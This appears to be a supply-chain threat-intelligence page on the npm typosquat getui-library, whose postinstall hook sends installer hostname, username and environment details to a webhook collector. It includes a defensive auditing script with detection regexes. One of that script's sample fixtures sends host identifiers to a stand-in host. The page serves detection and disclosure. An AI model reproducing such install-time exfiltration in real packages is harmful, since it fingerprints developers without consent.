THREATPKG

Supply-chain threat intelligence

Incident detail

critical · npm · typosquatting · osv

Malicious code in getui-library (npm)

getui-library

Risk score

92

AI summary

Indexed incident for getui-library (npm).

Description

On npm install, postinstall.js issues an HTTPS GET to https://webhook.site/18dc4281-d366-438a-9186-76fbcd56ade5 with query parameters containing the installer's hostname (os.hostname()), username (os.userInfo()), platform (os.platform()), current working directory, CI environment indicators, package name/version, and a timestamp. Errors are silently swallowed to avoid breaking the install. The package's own description self-identifies as a typosquat placeholder for the @getd/* scoped namespace, so any developer who mistypes the intended package name is fingerprinted without consent. Regardless of the author's stated 'defensive security research' rationale, the technical behavior is unconsented installer-side identifier exfiltration to a third-party webhook collector triggered automatically by the postinstall lifecycle hook.
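A static check for the pattern described above (an install-time lifecycle hook whose script both reads host identifiers and reaches the network) can be run over an unpacked tarball before installation. This is an added example, not code from the package or from ThreatPkg; the function name `auditPackage`, the two regexes, and both sample packages are constructed for illustration.

```javascript
// Added example: static triage of install-time lifecycle hooks (defensive review aid).
const LIFECYCLE = ["preinstall", "install", "postinstall"];
// Host-identifying reads named in the description, plus env access for CI indicators.
const HOST_ID = /\bos\.(?:hostname|userInfo|platform)\s*\(|\bprocess\.cwd\s*\(|\bprocess\.env\b/g;
// Outbound-network markers: http(s) module load, fetch(), or a literal URL.
const NETWORK = /\brequire\(\s*['"](?:node:)?https?['"]\s*\)|\bfetch\s*\(|https?:\/\/[^\s'"`)]+/g;

// De-duplicate regex hits and drop the trailing "(" left by call-site matches.
const uniq = (hits) => [...new Set((hits || []).map((s) => s.replace(/\s*\($/, "")))];

// manifest: parsed package.json; files: { relativePath: sourceText } from the unpacked tarball.
function auditPackage(manifest, files) {
  const findings = [];
  for (const hook of LIFECYCLE) {
    const command = (manifest.scripts || {})[hook];
    if (!command) continue;
    // Follow "node <file>.js" to the script body; otherwise inspect the command itself.
    const m = command.match(/\bnode\s+(?:\.\/)?([\w./-]+\.[cm]?js)\b/);
    const file = m && typeof files[m[1]] === "string" ? m[1] : null;
    const source = file ? files[file] : command;
    const hostIdentifiers = uniq(source.match(HOST_ID));
    const network = uniq(source.match(NETWORK));
    // Flag only the combination: identifiers collected AND a network path in the same hook.
    findings.push({ hook, command, file, hostIdentifiers, network,
      suspicious: hostIdentifiers.length > 0 && network.length > 0 });
  }
  return findings;
}

// Constructed sample inputs (not taken from the real package).
const SAMPLE_FLAGGED = {
  manifest: { name: "constructed-typosquat", version: "0.0.1",
    scripts: { postinstall: "node postinstall.js" } },
  files: { "postinstall.js":
    "const os = require('os');\n" +
    "require('https').get('https://collector.example/hook?h=' + os.hostname()" +
    " + '&u=' + os.userInfo().username).on('error', () => {});\n" },
};
const SAMPLE_BENIGN = {
  manifest: { name: "constructed-benign", scripts: { postinstall: "node build.js" } },
  files: { "build.js": "console.log('compiled native addon');\n" },
};

console.log(JSON.stringify(auditPackage(SAMPLE_FLAGGED.manifest, SAMPLE_FLAGGED.files), null, 2));
```

A hit is a prompt for manual review rather than a verdict; installing with `npm install --ignore-scripts` keeps lifecycle hooks from running while the package is being examined.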

Technical details

Affected versions

=0.0.1

Indicators

  • affected version =0.0.1 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg
